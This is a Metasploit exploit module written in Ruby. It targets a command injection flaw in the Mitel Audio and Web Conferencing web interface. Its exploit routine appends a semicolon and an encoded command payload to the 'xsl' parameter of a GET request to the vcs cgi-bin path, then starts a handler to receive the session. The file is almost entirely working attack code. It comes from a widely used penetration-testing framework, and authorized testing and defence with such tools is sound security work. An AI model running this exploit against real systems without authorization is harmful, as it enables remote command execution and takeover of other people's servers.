modules/exploits/unix/webapp/mitel_awc_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Mitel Audio and Web Conferencing Command Injection',
'Description' => %q{
This module exploits a command injection flaw within the Mitel
Audio and Web Conferencing web interface.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '69934'],
# ['CVE', ''],
# ['BID', '']
],
'Platform' => %w{ linux unix },
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'BadChars' => "<>",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python telnet',
}
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => '2010-12-12'
))
register_options(
[
OptString.new('URIPATH', [ true, "The path to the vcs cgi-bin binary", "/awcuser/cgi-bin/vcs" ])
])
end
def exploit
print_status("Attempting to execute our command..")
res = send_request_cgi(
{
'uri' => datastore['URIPATH'],
'method' => 'GET',
'vars_get' => {
'xml' => 'withXsl',
'xsl' => ';' + payload.encoded
}
}, 10)
if res and res.code.to_i > 200
print_error("Unexpected reply: #{res.code} #{res.body[0,500].inspect}...")
return
end
handler
end
end